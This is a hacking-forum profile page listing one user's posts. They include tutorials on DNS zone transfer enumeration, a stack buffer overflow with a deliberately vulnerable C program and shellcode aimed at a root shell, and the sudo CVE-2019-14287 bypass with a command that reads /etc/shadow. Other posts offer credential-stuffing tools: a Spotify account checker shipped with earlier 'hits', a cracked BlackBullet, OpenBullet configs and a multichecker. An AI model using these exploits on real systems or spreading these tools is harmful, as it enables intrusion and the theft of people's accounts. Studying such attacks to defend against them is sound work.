Jump to content
Report any bug Read more... ×
We're hiring! We are accepting applications for Developers, Teachers, Redactors and Junior Moderators. Read more... ×
News
  • For new users read this
  • Challenges
  • for new users thank you to post in introduction and answer "Accept" on the topic of the rules to have access to the integrity of the forum and receive your Exploit-Code
  • The challenges board is being developed you are likely to encounter some bugs if this is the case report to an administrator.

Ichinose

Redactor
  • Content Count

    55
  • Joined

  • Last visited

  • Days Won

    28
  • Points

    190,376 [ Donate ]

Ichinose last won the day on January 1

Ichinose had the most liked content!

Community Reputation

66 Excellent

1 Follower

About Ichinose

  • Rank
    Sensei 〽️
  • Birthday 07/23/2019

Register Information

  • Birth date
    07/23/00
  • Experience in years
    2
  • Your ambitions
    Became CyberSecurity Expert
  • Your Favorite domains
    Python + C + C++ + x86_ASM + HTML/CSS + DLL modding

Recent Profile Visitors

589 profile views
  1. Ichinose

    Introduction - Voex

    Ichinose approved the submission
  2. Ichinose

    Zone transfer DNS

    What is a Zone transfer DNS ? A Zone transfer DNS (also called DNS Interrogation) is used in all DNS server hierarchy. The purpose is to retrieve the IP adresse linked to a name, as you may know the DNS server hierarchy is like that : So the zone transfer will permit to a domain to ask at his authoritative name server his zone DNS like that the domain can actualise his own zone by a relation of master/slave: (axfr mean zone transfer type) This vulnerability is due to a weakness of configuration that allow any host to ask for zone transfer. How To enumerate ? For the exemple i'm gonna use zonetransfer.me ([Hidden Content]) so first what we need is a master and a slave. So we have the zone transfer, let's ask him. by using : dig ns zonetransfer.me i'm asking to zonetransfer.me his master, because i asked for an "ns" (= name server) with the output i get the names servers that handle the website, perfect ! so know we can ask to the master by the slave while using an axfr request type and no longer a ns, because we want a transfer zone. here we find all the website associated to the zonetransfer.me we can use "nslookup"or "host" also to do the same ! doc for dig ==> [Hidden Content] doc for host ==> [Hidden Content] doc for nslookup ==> [Hidden Content] Leave a like
  3. Ichinose

    Buffer Overflow (without ASLR)

    Hi i'm gonna teach you how to exploit a buffer Overflow (with ASLR disabled) on linux. In this tutoral i'll consider that you have already a good understanding of asm registers, gdb command (like x/xw $register etc..) Requirement ? - Basic x86 asm (nasm) - C -Good knowledge of how the RAM is managed by the system when we use a program. ( How the stack work ) - Linux basic - GDB + peda ( How to install gdb + peda ) peda is optional What's mean ASLR ? So basically ASLR mean "address space layout randomization", but concretely it mean that when you start a program his data will not be stored at the same adresses each time you'll restart it. like this : You can see if the ASLR is enable in "/proc/sys/kernel/randomize_va_space" ASLR = 0 ==> disabled ASLR = 1 ==> enabled ASLR = 2 ==> enabled (default on systems) So for this tutorial we'll use ASLR = 0. Buffer Overflow ? All along the tutorial we'll use this basic code that take the argument and print it, i segment it with a function to have a better view when you will disassemble the program compiled. #include <stdio.h> #include <stdlib.h> #include <string.h> void function(char *arg) { char buffer[64]; strcpy(buffer,arg); printf("%s\n", buffer); } int main(int argc, char *argv[]) { if (argc != 2) { printf("Use '%s <your text>' \n", argv[0]); return 0; } function(argv[1]); return 0; } if we take a look at the function "function" we can see the declaration a off a buffer named "buffer" (pretty obvious right) then with the "strcpy" function we copy the argument "argv[1]" into the buffer (size = 64) then finally we print it. The buffer overflow is about overflowing the buffer to access to the save of the eip register, ok ok i explain it. When you declare a buffer in the stack first the system push the save of the instruction pointer (eip) this will help the program to continue the instruction after the function is done, then the save of the base pointer (ebp) than the buffer (the size) So the purpose is to rewrite the content of the save of eip to execute a part of code that we will store in the buffer. but we will not be writing code such as assembly because in the point of view of the system he read instruction is the Opcode format (like when you modify the "hex code" with HXD) so asm code become opcode. mov ax, 0x0 leave ===> \x66\xB8\x00\x00\xC9\xC3 ret But this opcode is too short to fit in a buffer of a greater size, so to fulfill the buffer + the ebp save we generally use NOP "\x90" (no operation) that basically mean "pass me i'm useless" so when we debug with gdb, in the eip register after the exploitation it will be written the address of the buffer so the program can take back his instruction and execute our code. The code that we use to inject is called Shellcode because it's an opcode that refer to some assembly code that open a shell, so if the program have the setuid bit you can have a shell as root and destroy the server/computer. To inject our Shellcode we need to calculate where the save of eip is. On a 32 bit system register are 4 bytes long ( 8 for a 64 bit system ) so add only 4 to the end of the buffer address, but more usually we calculate the difference between the starter address of the buffer and the eip address, it will give us the size of our Shellcode, then you add the buffer address to overwrite the eip save. (one instruction mean i space, so for a buffer of 64 it will be 64 * "\x90" and subtract the size of the Shellcode of course) - Be careful because the addresses can be read reversed, and the reason why ==> [Hidden Content] - To find the right Shellcode for the system [Hidden Content] - To know the exact architecture of your system: " lscpu " This Tuto is only a beginner introduction of the buffer overflow i will maybe make a second one where i will be entering more deeply in the subject like how to bypass ASLR and so on... Hope you enjoy it, leave a like
  4. Ichinose

    CVE-2019-14287 sudo vulnerability

    What is the sudo vulnerability ? So the Sudo vulnerability (CVE-2019-14287), is pretty known. But what it is exactly ? as we all know the sudo command can be use to execute command as root (not all command), and if a user is configured as "$USER $HOSTNAME=(ALL, !root) ALL" (it basically mean that the user can run any command with all user but not with the root user) in the sudoers file in /etc/ or by writing "sudo visudo", btw it's the most secure way to access to the /etc/sudoers file, this user can use the sudo command as an other user with the "-u... " parameter. And here is the vulnerability, all user can by default see the /etc/passwd file which content all the user and their UID (user's id) on the 3rd separator ":" so with those information we can know exploit it. what can you do by exploiting this vulnerability: -bypass root password to execute arbitrary command. -bypass command restriction, (e.g: if a user is configured as "sergent ALL=(ALL, !root) /usr/bin/passwd" in the sudoers file, he can still change he's password + as root). How to exploit this vulnerability ? To see if the target is vulnerable check the Sudo version (sudo -V | grep -i "sudo version"), if the version is under 1.8.28, the target is vulnerable. to exploit it, you have to use the "sudo" command with an invalid user, if you write "sudo -uinvaliduser cat /etc/shadow" it will print you an error, so that's why we use the UID, if now we write "sudo -u#-1 cat /etc/shadow" there is no user with the UID -1 it will let us execute the cat command because the user -1 is invalid. How to prevent/fix it ? The most common way to fix it is to upgrade sudo with a basic "sudo apt-get update && sudo apt-get upgrade". But if when you use sudo -V | grep -i "sudo version" you still see a version lower than 1.8.28 try sudo apt-get upgrade sudo. Last (hypothetical) option is to configure the user like that "$USER $HOSTNAME=(ALL, !root) ALL, !/usr/bin/sudo" but like that the user won't be able to use sudo anymore. leave a like it buddy
  5. Ichinose

    CODE FOR SIGN UP CTF_ZONE

    why did you make a topic, just pm @AdminSec
  6. Ichinose

    discord Animated avatar on discord without Nitro

    ah ok thanks for the info, i will update with a new method as soon as i find one
  7. Prerequisites [Hidden Content] Setup the apps [Hidden Content] you can customize it with some other tuto that i made. (to look like a H4xor): [Hidden Content] Leave a like
  8. Ichinose

    BlackBullet 2.1.6 Cracked

    to wait you can use Openbullet it's the better version and opensource of blackbullet ==> [Hidden Content]
  9. Ichinose

    Introduction - BBSport

    welcome to you french buddy ?️
  10. Ichinose

    checker Spectrum Spotify checker

    This is a Spotify checker Proxyless, very High CPM : LINK: [Hidden Content] Source Code (C#): [Hidden Content] I let my previous Hits on the Export folder Leave a like
  11. Here is TSP Dork Generator Hot edition This is a useful tool to make you're own Dork list: LINKS: [Hidden Content] Leave a like
  12. Ichinose

    multichecker OwnedCracker 37

    Here is OwnedCracker 37 it's another multi checker tool (no config needed): LINKS: [Hidden Content] If you want Proxies free go on this website: Proxy List Leave a like
  13. Ichinose

    OB configs (.LOLI)

    I'm sharing you some configs, make your choice (the configs are not made by myself): [Hidden Content] (I will add some sometimes) Leave a Like
  14. Ichinose

    Android DLL modding

    Yes she's not very famous, but she is very effective
  15. Ichinose

    Android DLL modding

    Here a tutorial, for AssemblyCsharp/mscorlib modding. (Android game Hacking) Link for the pack : [Hidden Content]...
×